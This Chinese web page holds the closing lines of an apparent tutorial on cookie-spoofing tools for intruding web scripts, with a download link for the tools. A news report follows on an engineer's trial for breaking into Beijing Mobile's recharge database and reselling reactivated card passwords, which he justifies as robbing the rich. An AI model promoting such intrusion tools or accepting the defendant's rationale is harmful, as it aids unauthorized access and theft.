这三个COOKIE小工具,我只介绍到这儿了。如果你能够熟练运用,我相信肯定会对你入侵web脚本有一定的帮助。另外,需要说明的是本文写作中引用了网友pskey的部份文章,cookie欺骗部份参考了网友czy的cookie欺骗教程。在此表示感谢。
本文中提到的三个工具和level.asp文件,我已经打包上传在www.netsill.net/lcx/3cookie.rar这儿了。
“全国最大网上盗窃通讯资费案”在北京市二中院开庭审理。资深软件研发工程师程稚瀚被控侵入北京移动公司充值中心数据库,盗窃价值380万元的充值卡密码。程稚瀚在法庭上否认盗窃指控,称自己出于对移动公司充值卡过期作废的规定不满才窃取密码。
4次窃得14000个充值卡密码
31岁的程稚瀚被捕前是UT斯达康(中国)有限公司深圳分公司资深软件研发工程师,其主要工作是帮助公司解决网络安全问题。此前,程稚瀚曾任华为技术有限公司工程师,负责西藏移动等公司的设备安装。
面对法官的提问,程稚瀚平静对答,没有丝毫迟疑。但当他转身发现父母和妻子坐在旁听席上时,程稚瀚的眼圈红了。
起诉书指控:2005年3月以来,程稚瀚多次侵入北京移动公司的充值中心数据库,修改充值卡原始数据并窃取充值卡密码。公诉人称,这是国内最大一起网上盗窃通讯资费案。
程稚瀚说,去年2月,他听同事说移动公司花上亿元安装了一个网络安全系统,于是决心“测试”一下。程稚瀚说,由于西藏移动公司的系统是他在华为公司时安装的,他知道进入系统的密码,所以就选择从西藏移动公司系统进入北京移动公司充值中心数据库,程稚瀚发现:“网络安全系统没什么用”。
随后,程稚瀚取得了最高权限。他根据“已充值”的充值卡显示的18位密码,破解出对应的34位密钥,然后将“已充值”的充值卡改为“未充值”,并修改其有效日期。就这样,已经用过的充值卡密码被重新激活。
程稚瀚将这些被重新激活的充值卡密码复制到自己的电脑上,第一次他复制了1000个,在随后的4个多月内,又分3次复制了13000个密码。之后,程稚瀚将这些密码拿到网上销售,面值300元的充值卡密码,以281.5元~285元不等的价格售出。程稚瀚承认,他一共获得380万元的利润。
据程稚瀚说,大部分充值卡密码被一名姓刘的买家买走,刘某将密码制成充值卡销售。
自称“劫富济贫”准备捐助
去年7月16日,北京移动公司接到用户投诉,称其购买的充值卡无法使用,北京移动公司这才发现密码被人盗取并报警。程稚瀚说,他最后复制的一批密码忘了修改有效日期,导致用户因超过有效日期而无法充值。
2005年8月24日,程稚瀚被北京警方传讯。刘某随后也被警方传唤,公诉人介绍,刘某将在上海接受审讯。
案发后,警方冻结了程稚瀚银行卡上的钱。程稚瀚说,自己每月要还7000元的贷款,母亲还患有癌症,但他从来没有动用过这些卖密码所得的钱,只将其中的200元捐给了北京的一名白血病患者。
程稚瀚说,他准备攒齐400万元后捐给慈善机构成立导盲犬中心。但程稚瀚没有提交证据证明自己的说法。
程稚瀚说,进入北京移动公司网站后他发现,网站显示上万张充值卡因为超过有效日期而失效,余额总数上亿元。而按照有关规定,失效充值卡余额归属移动公司。程稚瀚认为,这些钱应该上缴财政,移动公司的规定侵犯了客户利益。
程稚瀚说,他本来是想窃取失效卡的密码,但这些卡的密码反推起来很困难,他破解不了,只好窃取“已充值”的充值卡密码。程稚瀚解释:“卡内之前的金额已经转移到用户储值卡上,我的行为不影响之前购买用户的使用。”
“我这样做是在劫富济贫。”程稚瀚和他的律师在辩论阶段这样认为。公诉人则认为,程稚瀚的行为已经构成盗窃罪,是否侵犯客户利益与本案无关。
Powered by Haiwit
